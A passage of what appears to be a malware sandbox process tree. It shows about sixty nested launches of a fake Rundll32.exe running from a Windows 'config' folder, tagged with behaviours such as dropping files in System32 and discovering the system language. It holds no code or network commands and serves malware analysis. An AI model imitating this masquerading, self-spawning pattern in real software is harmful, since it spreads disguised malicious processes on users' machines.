C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"65⤵PID:3532
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"66⤵PID:4572
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"67⤵PID:5680
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"68⤵
- Drops file in System32 directory
PID:5016 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"69⤵
- Drops file in System32 directory
PID:5192 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"70⤵PID:5884
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"71⤵
- Drops file in System32 directory
PID:5652 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"72⤵
- System Location Discovery: System Language Discovery
PID:3380 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"73⤵PID:3128
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"74⤵PID:4996
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"75⤵PID:2160
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"76⤵PID:1636
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"77⤵PID:1176
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"78⤵
- System Location Discovery: System Language Discovery
PID:2456 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"79⤵PID:2920
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"80⤵
- Drops file in System32 directory
PID:2788 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"81⤵
- Drops file in System32 directory
PID:1556 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"82⤵PID:4960
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"83⤵
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:492 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"84⤵PID:2696
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"85⤵
- Drops file in System32 directory
PID:1932 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"86⤵
- Drops file in System32 directory
PID:2404 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"87⤵
- Drops file in System32 directory
PID:3772 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"88⤵
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"89⤵PID:2512
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"90⤵
- System Location Discovery: System Language Discovery
PID:2492 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"91⤵PID:3540
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"92⤵
- Drops file in System32 directory
PID:4752 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"93⤵PID:4472
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"94⤵
- Drops file in System32 directory
PID:4652 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"95⤵PID:3004
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"96⤵PID:1440
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"97⤵
- Drops file in System32 directory
PID:5128 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"98⤵
- System Location Discovery: System Language Discovery
PID:788 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"99⤵PID:5248
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"100⤵PID:4636
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"101⤵PID:4488
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"102⤵
- Drops file in System32 directory
PID:5032 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"103⤵PID:260
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"104⤵PID:776
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"105⤵PID:2744
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"106⤵
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"107⤵
- System Location Discovery: System Language Discovery
PID:5048 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"108⤵
- Drops file in System32 directory
PID:1156 -
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"109⤵PID:1000
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"110⤵PID:2584
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"111⤵PID:5512
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"112⤵PID:1680
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"113⤵PID:4288
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"114⤵PID:2004
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"115⤵PID:5908
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"116⤵PID:5608
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"117⤵PID:3588
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"118⤵PID:4028
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"119⤵PID:1712
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"120⤵PID:5212
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"121⤵PID:3256
-
C:\Windows\SysWOW64\config\Rundll32.exe"C:\Windows\system32\config\Rundll32.exe"122⤵PID:5492
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-